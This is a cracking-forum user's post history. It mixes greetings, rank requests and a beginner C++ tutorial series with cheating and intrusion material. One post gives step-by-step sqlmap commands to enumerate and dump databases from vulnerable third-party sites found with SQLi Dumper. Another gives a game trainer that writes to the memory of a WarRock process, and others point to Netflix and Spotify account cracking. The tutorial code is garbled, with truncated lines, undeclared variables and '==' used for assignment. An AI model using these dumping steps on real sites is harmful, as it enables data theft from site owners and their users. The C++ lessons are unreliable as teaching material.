Pshyotic

Members
  • Content Count

    235
  • Last visited

Everything posted by Pshyotic

  1. Welcome to the forum I hope you will find everything you need. Read rules and don't be leecher :D
  2. [hide] SPOTIFY: https://www.youtube.com/watch?v=URWJsapckAU Pornhub: https://www.youtube.com/watch?v=PcDWzbK0NtA [/hide] :ezy: DON'T FORGET TO LEAVE LIKE :pepo:
  3. Pshyotic

    40x UPLAY w/ GAMES

    You are the best man on the planet heheh <3
  4. Hello everyone, here we are in the new tutorial of the C ++ programming language. [align=center]I did not posted anything for about 4 days, so it's time. [/align] If you have any questions about some of the previous tutorials or questions for this tutorial, please contact PM (Private Messages) or answer here on my topic so I can help you. PART 4. [hide] Okay, so with the previous code we can also do multiplying, dividing and subtractation. You should try to do this. So, for multiply operator is: * (of course it is lmao) for dividing operator is: / for subtractation operator is: - CODE: #include using namespace std; int main() { int num1; int num2; int sum; cout<<"Enter first number : "< cin>>num1; cout< cout<<"Enter second number :"; cin>>b; cout< sum=num1*num2; //Here we changed + in * cout<<"Sum of this two numbers is : "< system ("PAUSE"); return 0; } Try to change cout<<"Sum of this two numbers is : "< cout< [color=#3333cc][b]What happend ? [/b][/color] [color=#33ffff]Okay, so we just printed variable num1 which is entered by user and after that added [/color][color=#ff3333]" * "[/color][color=#33ffff] (we already knew that [/color][color=#33ffff]the operation that the user is going to do is multiply so we putted [/color][color=#ff3333]*[/color][color=#33ffff] (sign for multiply) in [/color][color=#ff3333]" * "[/color][color=#33ffff] which means, that will always show [/color][color=#ff3333]*[/color][color=#33ffff] after printing value of first variable and after value of variable [/color][color=#33cc33]num2[/color][color=#33ffff]. After this we putted sign of equalation[/color][color=#33ffff] ( [/color][color=#ff3333]=[/color] [color=#33ffff]) (do not let this confuse you, now we just print the equality on the screen and we didn't join value in the code, so whenever we add value to a variable we put [/color][color=#ff3333]==[/color][color=#33ffff]) and output in console will be:[/color] [color=#3399ff]Enter first number: 4 //(I just give an example, the user could enter any other number).[/color] [color=#3399ff]Enter second number: 2 //again example[/color] [color=#3399ff]4 * 2 = 8 //That is final output when he did multiplying[/color] [color=#33ffff]So that is what I wanted to show you what you can do also.[/color] [color=#33ffff]Also for programmers who have not Windows, the command for [/color][color=#33cc33]system("pause"); [/color][color=#33ffff] is:[/color] [color=#33ffff]You first must have declared one variable on begin: example: [/color] [color=#33cc33]char pause;[/color] [color=#33ffff]and on the end of program you have to put:[/color] [color=#33cc33]cin>>pause;[/color][color=#33ffff] everything other is same.[/color] [color=#33ffff]For residual numbers (for example, 3.34) you will need to use another type of data, such as [/color][color=#ff3333]float[/color][color=#33ffff] or [/color][color=#ff3333]double[/color][color=#33ffff], just change all int's into [/color][color=#ff3333]float[/color][color=#33ffff] or [/color][color=#ff3333]double[/color][color=#33ffff]. [/color] [center][b][color=#3333cc]I still do not want to bother you with data types and theory, but if you want I can write the theory or if any of my colleagues[size=medium][font=arial, sans-serif] [/font][/size]programmers want to do it, feel free, it will be my glad.[/color][/b][/center] [/hide] [center][color=#3333cc][size=x-large][font=roboto, sans-serif]That would[/font][/size][/color][color=#3333cc][size=x-large][font=roboto, sans-serif] be all for this tutorial.[/font][/size][/color][/center] [center][color=#3333cc][font=roboto, sans-serif]I hope you enjoyed and of course learned something new.[/font][/color][/center]
  5. Hello, -It was 3 days ago before I second time request active member rank, so now I have more activity, and I hope I'll finally get it this time. As I mentioned in my first request, one of my skills is programming, I know C ++ and Python. I started slowly to go into the story of cracking, so publishing some of my last threads are cracking, where I set up some tools or tutorials I found on the internet that I thought would be useful and helpful to others on the forum here. As I mentioned, one of my skills is programming, so I started a thread explaining the basic C ++ programming language, and I think that anyone who is interested in learning C ++ will have this thread really good and will serve it well. Also if would be possible I would like to get rank Coder or some rank which is for programmer guys, I think it'll help me a lot, when people saw I have that rank and saw my post about C++ tutorial, they will have more trust they can learn something from me. So yeah, that's it. Thank you. My threads: https://cracked.to/Thread-Tutorials-in-p...ng-section https://cracked.to/Thread-TUTORIAL-How-to-dump-database-10x-faster https://cracked.to/Thread-Netflix-checker-proxyless https://cracked.to/Thread-How-to-earn-by...games-link https://cracked.to/Thread-C-Tutorial-Lea...cracked-to https://cracked.to/Thread-First-game-tha...onsole-app
  6. Welcome I hope you will find everything you will need! Wish you all the best, read rules of forum!
  7. Pshyotic

    hello friends

    lol, Welcome! I hope you will enjoy and find everything you need. READ RULES, that's most important thing :smart:
  8. @TheCrazy Fixed and edited. Thanks for advice <3 I hope it's much better now.
  9. Hello everyone, here we are in the new tutorial of the C ++ programming language. If you have any questions about some of the previous tutorials or questions for this tutorial, please contact PM (Private Messages) or answer here on my topic so I can help you. Also the link from which you can download Code :: Blocks and Visual Studio: Visual Studio: https://visualstudio.microsoft.com/downloads/ Code::Blocks: http://codeblocks.org/downloads DON'T FORGET TO LEAVE LIKE <3 SO LET'S GO BACK ON OUR TUTORIAL PART 3: [hide] So far, we have met orders: cout<< and < What is it actually <<, this is actually one of the characters (operator) that the data goes to the exit under the command cout - meaning the output. Similarly, the < Today we will do a new command, and that's cin>> 1.What does that command actually do? It serves us to enter data from the screen through the keyboard and then of course prints with the command cout. However, we do not write like cin<<, because this (<<) operator serves for the data flow from the computer (memory) to the screen and we have to first input the data from the keyboard and then just print it. But for cin we use operator >> (of course with the cin command): cin>>num1; Just like that and again you should notice that ; on the end of this line. And we will print him on console screen with command: cout< [center][color=#ff3333]Just to don't make you confused, you could write this line of code like ( [/color][color=#33ffff]cout< [center][color=#3333cc]***Try more variations and test it yourself***[/color][/center] [color=#ff3333]All we mentioned is in the [/color][color=#33ffff][/color][color=#ff3333] (standard I / O) header of which we talked about in the first tutorial.[/color] [center][color=#3333cc]Do yo[/color][color=#3333cc]u remember the code from the last tutorial (part 2)?[/color][color=#3333cc] In which we wrote a program in which we did addition of two numbers, but we have initialized the variables in that last code.[/color][/center] [center][color=#3333cc]Are you for modifying a code slightly and allowing the user to enter the number itself? If your answer is yes, keep reading... [/color]:ezy:[color=#aaaaaa] [/color][/center] [code]#include using namespace std; int main() { int num1; int num2; int sum; cout<<"Enter first number : "< cin>>num1; cout< cout<<"Enter second number :"; cin>>b; cout< sum=num1+num2; cout<<"Sum of number1 and number2 is : "< system ("PAUSE"); return 0; }
  10. Yea , It's nicer but I'm still bored and mad cuz my dorks get shitty everytime I make em :feelssadman: Oooh don't cry :monkas: It's happening always around us :feelsgood: hahahaha But I still love your signature
  11. Poor boy... Bored hahahahahah <3 It's not good... Try this:
  12. Welcome ! You have a lot of tutorials in this forum sections: https://cracked.to/Forum-Cracking-Tutorials Also, some cracking tools: https://cracked.to/Forum-Cracking-Tools And this whole sections about cracking you can find on main page of this forum just go under shoutbox and click Cracking. Wish you luck and read the rules
  13. Hello, -It's been pretty since I first requested a rank active member. As I mentioned in my first request, one of my skills is programming, I know C ++ and Python. I have up to now 9 threads and I have 31 posts. I put in mostly just quality content and that's why I only have 9 threads. I started slowly to go into the story of cracking, so publishing some of my last threads are cracking, where I set up some tools or tutorials I found on the internet that I thought would be useful and helpful to others on the forum here. As I mentioned, one of my skills is programming, so I started a thread explaining the basic C ++ programming language, and I think that anyone who is interested in learning C ++ will have this thread really good and will serve it well. Also if would be possible I would like to get rank Coder or some rank which is for programmer guys, I think it'll help me a lot, when people saw I have that rank and saw my post about C++ tutorial, they will have more trust they can learn something from me. So yeah, that's it. Thank you. My threads: https://cracked.to/Thread-Tutorials-in-programming-section https://cracked.to/Thread-How-to-earn-by-playing-games-link https://cracked.to/Thread-C-Tutorial-Learn-how-to-program-on-cracked-to https://cracked.to/Thread-First-game-that-I-created-with-C-console-app
  14. [hide] [video=youtube]https://www.youtube.com/watch?v=wIxS1tPMVTY [/hide] :smart: DON'T FORGET TO LEAVE LIKE :fiesta:
  15. Chrome or Mozila, you asked ? :D Opera... bro <3
  16. Pshyotic

    Hi

    Hi and welcome. I hope you will learn something. Good luck
  17. Thank you a lot of... I really need some spotify acc's hehehe
  18. [hide] Step 1: After going through the whole SQLi Dumper process, find your injectable URL and hold on to it, these are usually found in the "Injectables" tab. Step 2: Install sqlmap on your preferred operating system, (this requires python) Step 3: Once installed launch sqlmap from here on out we will refer to this as just "sqlmap" (If installed with apt "sqlmap", if being launched via directory "sqlmap.py" or "python sqlmap.py") Step 4: Once you have sqlmap open enter the following into the terminal [sqlmap -u "URL"] include the quotations around the URL. Answer the questions to your preference Step 5: Scanning is done! Time to dump! (List databases): sqlmap -u "URL" --dbs (List tables): sqlmap -u "URL" -D "DATABASE" --tables (List columns): sqlmap -u "URL" -D "DATABASE" -T "TABLE" --columns (Initialize dump): sqlmap -u "URL" -D "DATABASE" -T "TABLE" -C "column1, column2, column3" --dump --eta Once it's done dumping it will notify you of the saved location for the database [/hide]
  19. Admins please put it in right section, I am sorry for this xD
  20. Hope it'll be hopefull. [hide]https://www.youtube.com/watch?v=ahhLZjVk9kw This is one of the basic methods [/hide]
  21. Hello everyone, here we are in the new tutorial of the C ++ programming language. [align=center] If you have any questions about some of the previous tutorials or questions for this tutorial, please contact PM (Private Messages) or answer here on my topic so I can help you.[/align] PART 2. [hide] Okay here we begin with another stuffs. Now we will talk about variables again as well as see a small program later. As I have already mentioned, we use int data type for whole numbers: int - we use for whole numbers as I said. Float and double - we use for numbers with decimal leftovers (The difference between float and double is of course the memory occupied) Char and string - We use for just some words or letters or text, and now I'll just write a few examples where we initialize the variable, declare it and assign the value (declare and define it). So the variables that we (the developers) set for the value and do not let the user enter the variable value of the keypad, we call INICIALIZATION. Example of declaring and inicialization of variables of different data types: int a==3; float b==2.0; double c=2.124352; char=='a'; string=="Here is going some text"; I am sure that you saw this char=='a'; char type is always mentioned with these characters ( ' ' ) because it is a single character, unlike the words we write between quotation marks " ", the words are in c ++ - in string(s) and we will talk about string(s) later. What I've forgotten to mention in the last tutorial is actually the name of the variable, the name of the variable can be the way you want to give the variable name, try to give the names exactly as this variable is used to make it easier for you to enter the code. It is important that you enter the name of the variable that you gave her the name when you declared it, so in capital letters, because the compiler is all different. Selecting the names of the variables is that you can not use the keywords of the c ++ language itself (commands and the rest that refers to the constituent part of the language itself) and try not to work in spaces rather than say my_variable and so on.One benefit is that if you use a C ++ language, it will become blue in the program where you write the code so that you can easily notice it. You will now be able to see down one code to do addition of two numbers: #include using namespace std; int main() { int num1 = 4; int num2=3; int sum; c=x+y; //here we did addition cout<<"Sum of num1 and num2 is : "< system("PAUSE"); return 0; } Okay so I told you that is probably better to use descriptive variables name so I did too. We did declaration and inicialization on beggining, after that we declared new variable and her name is sum (And point of this is that everything needs variable, sounds scary but it's not... you'll learn). After that we wrote formula, to give instructions to our computer what will he should do with our variables and he did addition. As you can see there is: sum=num1+num2; What is the most important thing and need explanation (I won't begginers get confused) is that cout<< Okay, so whenever we want to print something on console we have to write this cout<< , after this if you want some text you need to add this ( " " ) , and betwen these two you need to input your text. We could did this code without any text printing on console, just sum of this two numbers and that would look like: cout< [color=#3333cc][b]And printing in the first code would be as follows:[/b][/color] [b][color=#3399ff]Sum of num1 and num2 is: 7[/color][/b] [color=#99cc33][b]What you have noticed on ending is probably [/b][/color][color=#99cc33][b]this:[/b][/color][color=#99cc33][b] [/b][/color][color=#33ffff]< "[color=#33ffff]<< endl;[/color]" [color=#ff3333]tells the compiler that whatever the next one is printed in the console needs (and will be) printed in a new line. [/color] [color=#3333cc][b]You should try to copy the first code in this reply and paste him in your code editor and after printing sum of our two sums, add new line in our code and print something like:[/b][/color] [color=#33ffff]cout<<"Blaaah"; [/color] [color=#33ffff]cout<<"NewLine";[/color] [color=#3333cc][b]and output now will be:[/b][/color] [color=#3399ff][b]Sum of num1 and num2 is: 7[/b][/color] [color=#3399ff][b]BlaaahNewLine[/b][/color] [color=#ff3333]and this is reason why we add "[/color][color=#33ffff]< [/hide] [center][size=x-large][font=roboto, sans-serif][color=#3333cc]That would be all for this tutorial.[/color][/font][/size][/center] [center][size=medium][font=roboto, sans-serif][color=#3333cc]I hope you enjoyed and of course learned something new.[/color][/font][/size][/center]
  22. This is one of the old codes, so I hope it will help you get back to the game at least halfway from what you were, anyways you made mistake when you didn't sometimes read or write some codes. You know how they say, repetition is the mother of knowledge. If nothing is clear of this, then I suggest. Start learning from the beginning. :fuck: #include #include #include #include #include int stamina; // will store the stamina value bool dostamina = false; // determines if user activated stamina freezing LPVOID stamina_addr = (void*) 0x007F1110; // memory address of the stamina value in the WarRock process void screen() // output { system("cls"); // clear the screen printf("Hello World! This is my first WarRock trainer! \n\n"); if(dostamina) printf("[1] - freeze stamina [ENABLED]\n"); // if user enabled stamina freeze, let him know! else printf("[1] - freeze stamina [disabled]\n"); // same if it's disabled } int main(int argc, char* argv[]) { HANDLE hProcessSnap; // will store a snapshot of all processes HANDLE hProcess = NULL; // we will use this one for the WarRock process PROCESSENTRY32 pe32; // stores basic info of a process, using this one to read the ProcessID from hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 ); // make process snapshot pe32.dwSize = sizeof( PROCESSENTRY32 ); // correct size Process32First(hProcessSnap, &pe32); // read info about the first process into pe32 do // loop to find the WarRock process { if(strcmp(pe32.szExeFile, "WarRock.exe") == 0) // if WarRock was found { hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID); // open it, assigning to the hProcess handle break; // break the loop } } while(Process32Next(hProcessSnap, &pe32)); // loop continued until Process32Next deliver NULL or its interrupted with the "break" above CloseHandle( hProcessSnap ); // close the handle (just fuckin do it) if(hProcess == NULL) // self explanatory tbh { printf("WarRock not found\n\n"); getch(); // wait for a key press. otherwise the app will just close so fast when the process is not found, you wont know wtf happened. } else { screen(); // print the display char key = ' '; // make a key variable to store pressed keys while(key != VK_ESCAPE) // loop until user presses Escape { if(kbhit()) // if a key was pressed { key = getch(); // it is saved into "key" switch(key) // here the commands are handled depending on the key that was pressed { // case '1': ... break; case '2': ... break; and so on case '1': dostamina = !dostamina; // flip the dostamina value true<->false to enable/disable it ReadProcessMemory(hProcess, stamina_addr, &stamina, 4, NULL); // read the stamina value from the memory into the "stamina" variable break; } screen(); // print the display after each key press } if(dostamina) // if stamina freeze is activated WriteProcessMemory(hProcess, stamina_addr, &stamina, 4, NULL); // write the stamina value that was saved before with the key press into memory } CloseHandle(hProcess); // close the handle } return 0; // THE END }